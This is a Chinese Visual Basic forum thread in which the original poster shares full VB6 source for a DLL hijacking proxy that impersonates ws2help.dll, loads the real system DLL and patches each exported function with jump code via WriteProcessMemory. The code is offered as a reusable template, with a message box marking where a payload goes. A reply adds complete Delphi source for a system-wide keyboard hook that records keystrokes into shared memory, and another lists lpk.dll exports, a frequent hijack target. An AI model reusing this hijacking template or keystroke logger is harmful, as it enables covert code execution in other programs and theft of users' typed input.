VB做Dll劫持 有代码哦~~~

菜鸟学飞

如果要显示窗口什么的再加一个多线程初始化模块即可,为了简单这里用个messagebox代替
在编译的时候需要用到dll编译插件 并且需要导出函数(压缩包里面的导出函数表.txt )
可以使用本人的多功能编译插件编译
http://www.vbgood.com/thread-107527-1-1.html

代码如下

1. Option Explicit
   
2. Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
   
3. Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
   
4. Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
   
5. Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
   
6. 
   
7. Private Declare Function CreateIExprSrvObj Lib "msvbvm60.dll" (ByVal p1_0 As Long, ByVal p2_4 As Long, ByVal p3_0 As Long) As Long
   
8. Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
   
9. 
   
10. 
    
11. Public Function WahCloseApcHelper() As Long
    
12.         MsgBox "hello"
    
13. End Function
    
14. Public Function WahCloseHandleHelper() As Long
    
15.         MsgBox "hello"
    
16. 
    
17. End Function
    
18. Public Function WahCloseNotificationHandleHelper() As Long
    
19.         MsgBox "hello"
    
20. 
    
21. End Function
    
22. Public Function WahCloseSocketHandle() As Long
    
23.         MsgBox "hello"
    
24. 
    
25. End Function
    
26. Public Function WahCloseThread() As Long
    
27.         MsgBox "hello"
    
28. 
    
29. End Function
    
30. Public Function WahCompleteRequest() As Long
    
31.         MsgBox "hello"
    
32. 
    
33. End Function
    
34. Public Function WahCreateHandleContextTable() As Long
    
35.         MsgBox "hello"
    
36. 
    
37. End Function
    
38. Public Function WahCreateNotificationHandle() As Long
    
39.         MsgBox "hello"
    
40. 
    
41. End Function
    
42. Public Function WahCreateSocketHandle() As Long
    
43.         MsgBox "hello"
    
44. 
    
45. End Function
    
46. Public Function WahDestroyHandleContextTable() As Long
    
47.         MsgBox "hello"
    
48. 
    
49. End Function
    
50. Public Function WahDisableNonIFSHandleSupport() As Long
    
51.         MsgBox "hello"
    
52. 
    
53. End Function
    
54. Public Function WahEnableNonIFSHandleSupport() As Long
    
55.         MsgBox "hello"
    
56. 
    
57. End Function
    
58. Public Function WahEnumerateHandleContexts() As Long
    
59.         MsgBox "hello"
    
60. 
    
61. End Function
    
62. Public Function WahInsertHandleContext() As Long
    
63.         MsgBox "hello"
    
64. 
    
65. End Function
    
66. Public Function WahNotifyAllProcesses() As Long
    
67.         MsgBox "hello"
    
68. 
    
69. End Function
    
70. Public Function WahOpenApcHelper() As Long
    
71.         MsgBox "hello"
    
72. 
    
73. End Function
    
74. Public Function WahOpenCurrentThread() As Long
    
75.         MsgBox "hello"
    
76. End Function
    
77. 
    
78. Public Function WahOpenHandleHelper() As Long
    
79.         MsgBox "hello"
    
80. End Function
    
81. Public Function WahOpenNotificationHandleHelper() As Long
    
82.         MsgBox "hello"
    
83. End Function
    
84. 
    
85. Public Function WahQueueUserApc() As Long
    
86.         MsgBox "hello"
    
87. End Function
    
88. 
    
89. Public Function WahReferenceContextByHandle() As Long
    
90.         MsgBox "hello"
    
91. End Function
    
92. 
    
93. Public Function WahRemoveHandleContext() As Long
    
94.         MsgBox "hello"
    
95. End Function
    
96. 
    
97. Public Function WahWaitForNotification() As Long
    
98.         MsgBox "hello"
    
99. End Function
    
100. 
     
101. Sub Main()
     
102. 
     
103. End Sub
     
104. 
     
105. Public Function DllMain(ByVal hinstdll As Long, ByVal fdwReason As Long, ByVal lpvReserved As Long) As Long ' "VB标准DLL入口函数
     
106.         Const DLL_PROCESS_ATTACH    As Long = 1
     
107.         Const DLL_THREAD_ATTACH     As Long = 2
     
108.         Const DLL_PROCESS_DETACH    As Long = 0
     
109.         Const DLL_THREAD_DETACH     As Long = 3
     
110.         
     
111.         Dim nRet As Long
     
112.         nRet = 1
     
113.         Select Case fdwReason
     
114.                 Case DLL_PROCESS_ATTACH
     
115.                         CreateIExprSrvObj 0, 4, 0
     
116.                         If LoadOldDll() = False Then
     
117.                                 nRet = 0
     
118.                         Else
     
119.                                 MessageBox 0, "劫持Dll 成功", "提示", 16
     
120.                         End If
     
121.                 Case DLL_THREAD_ATTACH
     
122.                 Case DLL_PROCESS_DETACH
     
123.                 Case DLL_THREAD_DETACH
     
124.         End Select
     
125.         DllMain = nRet
     
126. End Function
     
127. 
     
128. Public Function WriteJmpCode(ByVal addr As Long, ByVal jmpAddr As Long) As Long
     
129.         Dim bin As Byte
     
130.         Dim Jmpcode As Integer
     
131. '00401208 >    B8 01000000   mov     eax, 1
     
132. '0040120D      FFE0          jmp     eax
     
133.         
     
134.         bin = &HB8
     
135.         Jmpcode = &HE0FF
     
136. 
     
137.         WriteProcessMemory -1, addr, bin, 1, ByVal 0
     
138.         WriteProcessMemory -1, addr + 1, jmpAddr, 4, ByVal 0
     
139.         WriteProcessMemory -1, addr + 5, Jmpcode, 2, ByVal 0
     
140. 
     
141. End Function
     
142. 
     
143. Public Function LoadOldDll() As Boolean
     
144. 
     
145.         Dim ModHandle  As Long
     
146.         
     
147.         ModHandle = LoadLibrary("C:\windows\system32\ws2help.dll")
     
148.         If ModHandle > 0 Then
     
149.                
     
150.                
     
151.                 WriteJmpCode AddressOf WahCloseApcHelper, GetProcAddress(ModHandle, "WahCloseApcHelper")
     
152.                
     
153.                 WriteJmpCode AddressOf WahCloseHandleHelper, GetProcAddress(ModHandle, "WahCloseHandleHelper")
     
154.                
     
155.                 WriteJmpCode AddressOf WahCloseNotificationHandleHelper, GetProcAddress(ModHandle, "WahCloseNotificationHandleHelper")
     
156.                
     
157.                 WriteJmpCode AddressOf WahCloseSocketHandle, GetProcAddress(ModHandle, "WahCloseSocketHandle")
     
158.                
     
159.                 WriteJmpCode AddressOf WahCloseThread, GetProcAddress(ModHandle, "WahCloseThread")
     
160.                
     
161.                 WriteJmpCode AddressOf WahCompleteRequest, GetProcAddress(ModHandle, "WahCompleteRequest")
     
162.                
     
163.                 WriteJmpCode AddressOf WahCreateHandleContextTable, GetProcAddress(ModHandle, "WahCreateHandleContextTable")
     
164.                
     
165.                 WriteJmpCode AddressOf WahCreateNotificationHandle, GetProcAddress(ModHandle, "WahCreateNotificationHandle")
     
166.                
     
167.                 WriteJmpCode AddressOf WahCreateSocketHandle, GetProcAddress(ModHandle, "WahCreateSocketHandle")
     
168.                
     
169.                 WriteJmpCode AddressOf WahDestroyHandleContextTable, GetProcAddress(ModHandle, "WahDestroyHandleContextTable")
     
170.                
     
171.                 WriteJmpCode AddressOf WahDisableNonIFSHandleSupport, GetProcAddress(ModHandle, "WahDisableNonIFSHandleSupport")
     
172.                
     
173.                 WriteJmpCode AddressOf WahEnableNonIFSHandleSupport, GetProcAddress(ModHandle, "WahEnableNonIFSHandleSupport")
     
174.                
     
175.                 WriteJmpCode AddressOf WahEnumerateHandleContexts, GetProcAddress(ModHandle, "WahEnumerateHandleContexts")
     
176.                
     
177.                 WriteJmpCode AddressOf WahInsertHandleContext, GetProcAddress(ModHandle, "WahInsertHandleContext")
     
178. 
     
179.                 WriteJmpCode AddressOf WahNotifyAllProcesses, GetProcAddress(ModHandle, "WahNotifyAllProcesses")
     
180.                
     
181.                 WriteJmpCode AddressOf WahOpenApcHelper, GetProcAddress(ModHandle, "WahOpenApcHelper")
     
182.                  
     
183.                 WriteJmpCode AddressOf WahOpenCurrentThread, GetProcAddress(ModHandle, "WahOpenCurrentThread")
     
184.                
     
185.                 WriteJmpCode AddressOf WahOpenHandleHelper, GetProcAddress(ModHandle, "WahOpenHandleHelper")
     
186.                
     
187.                 WriteJmpCode AddressOf WahOpenNotificationHandleHelper, GetProcAddress(ModHandle, "WahOpenNotificationHandleHelper")
     
188.                
     
189.                 WriteJmpCode AddressOf WahQueueUserApc, GetProcAddress(ModHandle, "WahQueueUserApc")
     
190.                
     
191.                 WriteJmpCode AddressOf WahReferenceContextByHandle, GetProcAddress(ModHandle, "WahReferenceContextByHandle")
     
192.                
     
193.                 WriteJmpCode AddressOf WahRemoveHandleContext, GetProcAddress(ModHandle, "WahRemoveHandleContext")
     
194.                
     
195.                 WriteJmpCode AddressOf WahWaitForNotification, GetProcAddress(ModHandle, "WahWaitForNotification")
     
196.             
     
197.                 LoadOldDll = True
     
198.                
     
199.         Else
     
200.                 LoadOldDll = False
     
201.         End If
     
202. End Function
     

复制代码

JuncoJet

lz真有闲功夫。。

cxbs

楼主对Dll有研究，可以请教一个问题吗，就是能不能VB在Exe里加载一个VB Dll(类似显示窗口From1.Show vbModal)，但是加载必须要等DLL关闭了才可以继续执行下去，能不能像Exe里显示一个窗口用:From1.Show 后可以继续打开其它窗口呢，之前我想到用DLL驻入内存（就是在EXE里加载了DLL后，DLL在后台运行，就算Exe关闭了Dll还在运行)，可是我试了很多方法都没有成功，希望能指点一下，在此先谢谢了！

196466517

一直不明白咱用。。。这个生成dll后替系统下的dll还是注入dll

cxbs

cxbs 发表于 2012-3-3 09:33
楼主对Dll有研究，可以请教一个问题吗，就是能不能VB在Exe里加载一个VB Dll(类似显示窗口From1.Show vbModa ...

可以在EXE里创建一个线程并加载DLL里的窗口吗？

h907308901

汗，全给HOOK掉了

cxbs

cxbs 发表于 2012-3-3 09:33
楼主对Dll有研究，可以请教一个问题吗，就是能不能VB在Exe里加载一个VB Dll(类似显示窗口From1.Show vbModa ...

这个就是可以在VB EXE里定义并执行了DLL里的函数后，VB EXE关闭了DLL还在内存中运行

library KEYHOOK;
uses
  Windows;

const BUFFER_SIZE = 16 * 1024;
const HOOK_MEM_FILENAME = 'SAMPLE KEY_HOOK_MEM_FILE';
const HOOK_MUTEX_NAME = 'SAMPLE KEY_HOOK_MUTEX_NAME';
type
  TShared = record
    Keys: array[0..BUFFER_SIZE] of Char;
    KeyCount: Integer;
  end;
  PShared = ^TShared;
var
  MemFile, HookMutex: THandle;
  hOldKeyHook: HHook;
  ProcSaveExit: Pointer;
  Shared: PShared;
  //键盘钩子过滤函数
function KeyHookProc(iCode: Integer; wParam: wParam; lParam: lParam): LRESULT
  ; stdcall; export;
const KeyPressMask = $80000000;
begin
  if iCode < 0 then
    Result := CallNextHookEx(hOldKeyHook, iCode, wParam, lParam)
  else begin
    if ((lParam and KeyPressMask) = 0) then {// 键按下} begin
      Shared^.Keys[Shared^.KeyCount] := Char(wParam and $00FF);
      Inc(Shared^.KeyCount);
      if Shared^.KeyCount >= BUFFER_SIZE - 1 then Shared^.KeyCount := 0;
    end;
    iCode := -1;
    Result := CallNextHookEx(hOldKeyHook, iCode, wParam, lParam);
  end;
end;
// 设置钩子过滤函数
function EnableKeyHook: BOOL; export;
begin
  Shared^.KeyCount := 0; //初始化键盘指针
  if hOldKeyHook = 0 then begin
    hOldKeyHook := SetWindowsHookEx(WH_KEYBOARD, KeyHookProc, HInstance, 0);
  end;
  Result := (hOldKeyHook = 0);
end;
//撤消钩子过滤函数
function DisableKeyHook: BOOL; export;
begin
  if hOldKeyHook = 0 then begin
    UnHookWindowsHookEx(hOldKeyHook); // 解除 Keyboard Hook
    hOldKeyHook := 0;
    Shared^.KeyCount := 0;
  end;
  Result := (hOldKeyHook = 0);
end;
//取得键盘缓冲区中击键的个数
function GetKeyCount: Integer; export;
begin
  Result := Shared^.KeyCount;
end;
//取得键盘缓冲区的键
function GetKey(index: Integer): Char; export;
begin
  Result := Shared^.Keys[index];
end;
//清空键盘缓冲区
procedure ClearKeyString; export;
begin
  Shared^.KeyCount := 0;
end;
//DLL的退出处理过程
procedure KeyHookExit; far;
begin
  if hOldKeyHook = 0 then DisableKeyHook;
  UnMapViewOfFile(Shared); // 释放内存映象文件
  CloseHandle(MemFile); // 关闭映象文件
  ExitProc := ProcSaveExit;
end;
exports // 定义输出函数
  EnableKeyHook,
  DisableKeyHook,
  GetKeyCount,
  ClearKeyString,
  GetKey;
begin
  // DLL 初始化部分
  HookMutex := CreateMutex(nil, True, HOOK_MUTEX_NAME);
  // 通过建立内存映象文件以共享内存
  MemFile := OpenFileMapping(FILE_MAP_WRITE, False, HOOK_MEM_FILENAME);
  if MemFile = 0 then
    MemFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShared), HOOK_MEM_FILENAME);
  Shared := MapViewOfFile(MemFile, FILE_MAP_WRITE, 0, 0, 0);
  ReleaseMutex(HookMutex);
  CloseHandle(HookMutex);
  ProcSaveExit := ExitProc; // 保存DLL的ExitProc
  ExitProc := @KeyHookExit; // 设置DLL新的ExitProc
end.

19900603

  这办法不错呦。。。不知道Push Ret Hook 在Dll 中能否实现 有空我研究下
附上 Lpk 导出函数表
ftsWordBreak
LpkUseGDIWidthCache
LpkPSMTextOut
LpkGetTextExtentExPoint
LpkGetCharacterPlacement
LpkExtTextOut
LpkEditControl
LpkDrawTextEx
LpkDllInitialize
LpkTabbedTextOut
LpkInitialize

qq275158045

我这边有的程序加载的话 提示出错喔！大大

qq275158045

会提示：应用程序正常初始化(0xc000007b)失败。请单击“确定”，终止应用程序。